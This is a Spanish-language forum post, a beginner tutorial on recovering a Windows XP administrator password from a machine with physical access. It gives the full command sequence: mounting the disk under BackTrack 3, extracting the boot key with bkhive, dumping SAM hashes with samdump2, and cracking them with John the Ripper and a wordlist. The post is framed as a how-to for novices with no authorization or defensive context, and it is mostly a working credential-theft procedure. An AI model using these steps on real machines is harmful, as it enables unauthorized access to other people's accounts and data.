Crackear password de administrador en windows usando Backtrack 3

Iniciado por dracko.rx, Febrero 25, 2010, 11:25:50 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Bueno se ke ya existe mucha info sobre esto, pero bueno un poco mas no hace daño a nadie.
Ademas este tuto va enfocado a los novatos, bueno espero ke les guste y perdonen si no pongo capturas pero lo hice de rapido, ademàs creo ke kedarà muy entendible apesar de no usar imagenes y pues cualkier duda pueden preguntar.

Herramientas:

1)Una pc con windows xp, funciona tmb para versiones mas viejitas, en vista la vdd no se si funcione pues no lo he probado pero me imagino ke si

2)Acceso fisico a la pc

3)Una distribucion de linux, en mi caso usarè mi buen amigo backtrack 3.
Uso backtrack xq ya trae muchas herramientas de crackeo instaladas pero da igual la ke usen

empezàmos por abrir una consola de bt3

y tecleamos lo sig:

Código: php

ls /mnt/hda1


en mi caso es hda1 pero en el de uds puede variar un poco, puede ser sda1, sda2, hda2, etc

y nos desplegarà algo como esto:

Código: php

bt ~ # ls /mnt/hda1
AUTOEXEC.BAT*              IO.SYS*                       boot.ini*
AppServ/                   MSDOS.SYS*                    datos.sql*
Archivos\ de\ programa/    NTDETECT.COM*                 eclipse/
Bootfont.bin*              RECYCLER/                     ntldr*
CONFIG.SYS*                Sun/                          pagefile.sys*
Config.Msi/                System\ Volume\ Information/  xampp/
Documents\ and\ Settings/  WINDOWS/


estos son los archivos ke tengo en mi pc, en mi disco duro C:/, obviamente en el de uds va a cambiar

procedemos a crear una carpeta:

Código: php

mkdir /crack
cd /crack


Ahora ke ya estàmos dentro de /crack

ahora vamos a extraer la boot key y guardarla en un archivo .txt llamado bootkey.txt:

Código: php

bkhive /mnt/hda1/WINDOWS/system32/config/system bootkey.txt


les tiene ke aparecer algo parecido a esto:

Código: php
Bootkey: 5da3c4796d09d5ca929d8498c6af87c9


Ahora vamos a extraer el hash del archivo SAM y guardarlo como hash.txt:

Código: php


samdump2 /mnt/hda1/WINDOWS/system32/config/SAM bootkey.txt >hash.txt


Una vez hecho esto ya tenemos el contenido del archivo SAM que es donde se encuentran los passwords en hash.txt. ahora vamos a crackearlo.

para esto usarèmos un diccionario  y john the ripper

necesitàmos tener el diccionario en la misma carpeta donde estàmos (crack)
recuerden ke un diccionario no es mas ke un archivo de texto ke contiene varias palabras (posibles passwords).

Bien una vez ke ya tenèmos el diccionario (words.txt) tecleamos lo sig para crackear el hash:

Código: php

john hash.txt -f:NT -w:words.txt


y nos darà el password del windows

recordèmos ke si el password no està en el diccionario, pues entonces es imposible crackearlo

por eso para ke este atake funcione necesitamos tener un buen diccionario

cualkier duda aki estoy

salu2

Fuente: Devilboy

Venta de diseños - Contactar por MP

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta